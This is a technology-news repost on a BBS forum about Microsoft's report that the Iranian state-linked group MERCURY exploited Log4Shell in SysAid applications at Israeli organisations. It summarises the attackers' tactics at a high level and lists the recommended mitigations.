1. Forum
  2. tqwNet
  3. TQW_GENTECH

  • Hackers are still abusing Log4j deployments, Microsoft warns

    From TechnologyDaily@1337:1/100 to All on Fri Aug 26 13:30:04 2022
    Hackers are still abusing Log4j deployments, Microsoft warns

    Date:
    Fri, 26 Aug 2022 12:13:40 +0000

    Description:
    Iranian state-sponsored actors are targeting Israeli firms using Log4Shell flaws, Microsoft says.

    FULL STORY ======================================================================

    Log4Shell, one of the largest and potentially most devastating
    vulnerabilities to ever be discovered, is still being leveraged by threat actors more than half a year after it was first observed, and patched.

    A new report from the Microsoft Threat Intelligence Center (MSTIC), and Microsoft 365 Defender Research Team said recently discovered threat actors known as MERCURY (also known as MuddyWater) have been leveraging Log4Shell against organizations all located in Israel. MERCURY is believed to be a state-sponsored threat actor from Iran, under the direct command of the Iranian Ministry of Intelligence and Security.

    The criminals used the flaw on SysAid applications, which is a relatively novel approach, the teams said: While MERCURY has used Log4j 2 exploits in
    the past, such as on vulnerable VMware apps, we have not seen this actor
    using SysAid apps as a vector for initial access until now. Establishing persistence, stealing data

    The group uses Lof4Shell to gain access to target endpoints, and drop web shells that give them the ability to execute several commands. Most of them are for reconnaissance, but one downloads more hacking tools.

    After using Log4Shell to gain access to target endpoints , MERCURY
    establishes persistence, dumps credentials, and moves laterally across the target network, Microsoft says.

    It adds a new admin account to the compromised system, and adds leveraged software in the startup folders and ASEP registry keys, to ensure persistence even after reboot. Read more

    Log4j security threats could be here for a long time



    Log4j attacks are still a major threat, warns Microsoft


    Best malware removal today: paid and free services

    To mitigate the threat of MERCURY, Microsoft recommends adopting a number of security considerations, including checking to see if the organization uses SysAid and applying security patches and updates, if available.

    Organizations should also block inbound traffic from IP addresses specified
    in the indicators of compromise table, found here . All authentication activity for remote access infrastructure should be reviewed, with IT teams focusing mostly on accounts configured with single-factor authentication. Finally, multi-factor authentication (MFA) needs to be enabled wherever possible. These are the best firewalls around



    ======================================================================
    Link to news story: https://www.techradar.com/news/hackers-are-still-abusing-log4j-deployments-mic rosoft-warns/


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)